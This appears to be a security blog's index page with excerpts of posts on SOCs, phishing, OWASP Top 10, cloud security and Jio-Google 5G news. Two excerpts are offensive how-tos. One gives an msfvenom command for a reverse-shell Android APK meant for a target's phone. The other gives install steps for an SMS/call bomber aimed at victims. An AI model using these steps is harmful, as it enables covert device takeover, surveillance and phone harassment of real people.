Posts

SOC: Security Operations Center

Image
 A Security Operations Center (SOC) is a centralized unit that deals with security issues on an organizational and technical level. This is the definition of SOC. But wait did you get it?   Lets simplify it. You all know what "Hub" is...(You are reading a blog post on InfoSec Hub 🙇 )  A SOC acts like the hub. it continuously monitors organization's security posture while preventing, detecting ,analyzing and responding to cybersecurity incidents.         Main Work Done By SOC SOC monitors and analyze activity on networks,servers,endpoints and databases,applications and so on.   Establishing SOC  The first step in establishing an organization’s SOC is to clearly define a strategy that incorporates business-specific goals from various departments as well as input and support from executives. Plus infrastructure is required to support the strategy which is going to be implemented.   Benefits Of SOC Improvement in security incident detection Advantage for companies to defen

How to create a payload and access Android?

Image
Try at your own risk. Only for educational purpose. First let us get the basics clear...   What is Payload? In computer networking and telecommunications, when a transmission unit is sent from the source to the destination, it contains both a header and the actual data to be transmitted. This actual data is called the payload . What we will do? We will access the android device by creating a payload.   What we will get? We will get the full control of the android device for ex camera snapshots, call logs, contact logs, apps installed in phone, system info etc. How we will do this?      With the help of Metasploit we will create an apk file ie.payload. Then we will send this apk file to target target device. After installing the file on target device we will get full control of the device. Lets Start... We will use Kali Linux for this purpose.  First create a payload root@kali :~# msfvenom -p android/meterpreter/reverse_tcp LHOST=(your ip) LPORT=5555 R > filename.apk

T Bomb: SMS and Call Bomber! Hangs Your Smartphone!

Image
Discovering a tool which has capibility to hang your smartphone! T Bomb is an open source call and SMS bomber for Linux and Termux. T Bomb can send unlimited sms and calls on victim's phone so that the hang can get hang.  Installation Step 1. Type command  pkg install git Step 2. pkg install python Step 3. git clone https://github.com/TheSpeedX/TBomb.git Step 4. cd TBomb Step 5. chmod +x TBomb.sh  Now run the tool Step 6. cd TBomb Step 7. ./TBomb.sh And Boom!!! Now perform as per instructed. Press Enter Press 1 for SMS bomber Press 2 for Call bomber Press 3 To  Update (Works On Linux And Linux Emulators) Press 4 To  View Features Press 5 To  Exit Important: Only For Educational Purpose. We are not responsible if any kind of misuse of this tool is identified.

Jio-Google Brings 5G Revolution In India!

Image
Today world is facing Corona pandemic. This resulted in a global lockdown thereby affecting world-wide unemployment. Millions of people lost their job. But there are some exceptions. Many companies big and small experienced great losses in their businesses. Some even went bankrupt. But on the other hand their are some companies that found way and reached new heights. And Reliance Jio is one of them. Reliance Jio already bought revolution in Telecom industry by launching Jio in 2016 and providing free / cheap mobile data. Now Jio made various contracts by companies such as Facebook, Qualcomm,Intel and now The Tech Giant Google. This made Mukesh Ambani 6th Most Richest person in the world. He overtook Larry Page in the list. In the 43rd RIL AGM, Google declared to invest Rs.33737 Crores at 7.7% stake. Jio made binding partnership and investment agreement with Google. After Google's investment now total 14 companies have invested in Jio.  Vario

Phishing: A sweet poison!

Image
Phishing  is a fradulent attempt to obtain sensitive information such as passwords, usernames, credit card details by disguising oneself as a trustworthy entity in an electronic communication. This is how Phishing is defined.Got It? No. That's ok. You will get it by the end of this blog. Hackers are creative and they should be!  One such famous hacking technique or a way to gain information of target user is is called Phishing. Phising is method to gather personal information using mainly deceptive emails and websites. The goal is to make the target believe that the message,mail or website is something important for him for example a bank request,donation and to force him to click the link. It is one of the oldest type of cyberattacks dating back to 1990's and still one of the most popular attack between hackers. How Phishing got its name? Yes you guessed it right. Phishing is similar to word Fishing. The letter "f" is replaced by "p". As in fishing, the fis

OWASP Top 10 vulnerabilities

Image
What is OWASP? OWASP which stands for Open Web Application Security Project is an international non-profit organization dedicated to web application security.  It produces various articles, methodologies, tools and technologies in the field of web application security. It was established in 2001 with the goal to protect web applications from cyber attacks. What is OWASP Top 10?    OWASP Top 10 prioritizes most common web securities risks affecting the web applications. The point to consider here is that there are more than 10 security but only top 10 are included. There are four criterias used for making this list. They are Ease of exploitability Prevalence Detectibility Business Impact The list was firstly published in the year 2003. Then updated in the year 2004,2007,2010,2013 and 2017. Top 10 Vulnerabilities 1.Injection An Injection vulnerability allows attackers to send unfriendly,hostile data to an interpreter causing the data to be compiled and executed on the server. If your app

Cloud Security Explained

Image
As we know that cloud is nothing but a server which we (companies) take on rent to host their websites, apps and other such data. Security is very essential in cloud computing. Cloud Security consists of set of policies, controls and technologies that work together in union to protect cloud based systems. Cloud Security is protection of data from leakage,deletion ,data breach , session hijacking, insecure APIs,etc that can comprimise cloud security. Cloud data Security becomes important as we move our data centres, business processes to the cloud. Benefits of Cloud Security- Centralized security - As cloud centralizes aplications and data, cloud security centralizes protection. Managing the entities centrally enhances traffic analysis and web filtering. Reduced cost - The big advantage of using cloud storage and security is that it eliminates need for dedicated hardware. cloud offers 24/7 proactive security. Reliability - Cloud is very dependable. Users can safely acce